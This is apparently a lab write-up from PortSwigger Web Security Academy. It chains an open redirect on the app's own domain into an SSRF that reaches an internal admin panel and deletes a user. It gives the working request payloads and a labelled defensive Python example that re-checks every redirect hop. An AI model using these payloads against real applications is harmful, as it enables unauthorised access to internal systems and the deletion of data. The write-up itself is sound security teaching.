| Field | Value |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | SSRF — Open Redirect Filter Bypass |
| Difficulty | Practitioner |
| Objective | Bypass the SSRF filter using an open redirect to reach http://192.168.0.12:8080/admin and delete carlos |
SSRF with Filter Bypass via Open Redirection Vulnerability — Writeup
Initial Observation
Intercepting the stock check request:
stockApi=/product/stock/check?productId=1%26storeId=1
This time stockApi is a relative path — the server only fetches URLs within its own domain. Injecting an external IP or localhost directly would be filtered. We need something the filter accepts.
Confirming the domain restriction — swapping to the full application URL works fine:
stockApi=https://0a1900ad03a488a082b751cd00230068.web-security-academy.net/product/stock/check?productId=1%26storeId=1
The filter allows the application's own domain. Now we need a path on that domain that can redirect us somewhere else.
Finding the Open Redirect
Looking at the product page — there's a "Next product" link:
/product/nextProduct?currentProductId=1&path=/product?productId=2
The path parameter controls where the redirect goes. Testing with an external domain:
/product/nextProduct?currentProductId=1&path=https://google.com
Redirects to Google. Open redirect confirmed — path is completely unsanitized.
Chaining Open Redirect + SSRF
The filter accepts the application's own domain. The application has an open redirect at /product/nextProduct. Pointing stockApi at the redirect endpoint with the internal admin URL as the path:
stockApi=/product/nextProduct?currentProductId=1%26path=http://192.168.0.12:8080/admin
(%26 is a URL-encoded &. Without it, path= would be parsed as a separate parameter of the outer stock-check request instead of staying inside the stockApi value passed to /product/nextProduct.)
The filter sees a path on the allowed domain — passes. The server follows the redirect — lands on the internal admin interface.
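The root cause is that the filter validates only the first URL and then lets the HTTP client follow redirects unchecked. The following added example (not code from the lab or from PortSwigger) contrasts that weak policy with a fetcher that re-validates every redirect hop against the allowlist; the hostname shop.example and the REDIRECTS table standing in for live Location headers are constructed assumptions.

```python
from urllib.parse import urlparse, urljoin

# Assumption: the only host the stock API is permitted to fetch from.
ALLOWED_HOSTS = {"shop.example"}
MAX_REDIRECTS = 3

# Constructed request URLs mirroring the lab's two uses of the redirect endpoint.
LEGIT_URL = "https://shop.example/product/nextProduct?currentProductId=1&path=/product?productId=2"
ATTACK_URL = "https://shop.example/product/nextProduct?currentProductId=1&path=http://192.168.0.12:8080/admin"

# Constructed stand-in for HTTP: requesting the key URL yields this Location header.
REDIRECTS = {
    LEGIT_URL: "/product?productId=2",
    ATTACK_URL: "http://192.168.0.12:8080/admin",
}


def hop_allowed(url):
    """Allowlist check applied to one URL: scheme and exact hostname match."""
    p = urlparse(url)
    return p.scheme in ("http", "https") and p.hostname in ALLOWED_HOSTS


def resolve_chain(url, check_every_hop):
    """Walk the redirect chain and return (final_url, allowed).

    check_every_hop=False reproduces the vulnerable filter: only the initial
    URL is validated, so a redirect can carry the fetch anywhere.
    check_every_hop=True is the hardened policy: each Location target is
    re-validated before it is followed, and unbounded chains are refused.
    """
    if not hop_allowed(url):
        return url, False
    for _ in range(MAX_REDIRECTS):
        location = REDIRECTS.get(url)
        if location is None:          # no redirect: this is the final target
            return url, True
        url = urljoin(url, location)  # resolve relative Location values
        if check_every_hop and not hop_allowed(url):
            return url, False
    return url, False                 # too many redirects: fail closed


if __name__ == "__main__":
    for label, url in (("legit", LEGIT_URL), ("attack", ATTACK_URL)):
        print(label, "vulnerable:", resolve_chain(url, check_every_hop=False))
        print(label, "hardened: ", resolve_chain(url, check_every_hop=True))
```

Note that the in-domain "Next product" redirect still works under the hardened policy, so re-validating hops closes the bypass without breaking the legitimate feature.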
Admin panel returns in the response. Sending the delete request:
stockApi=/product/nextProduct?currentProductId=1%26path=http://192.168.0.12:8080/admin/delete?username=carlos
Again, the carlos account is deleted. Lab solved.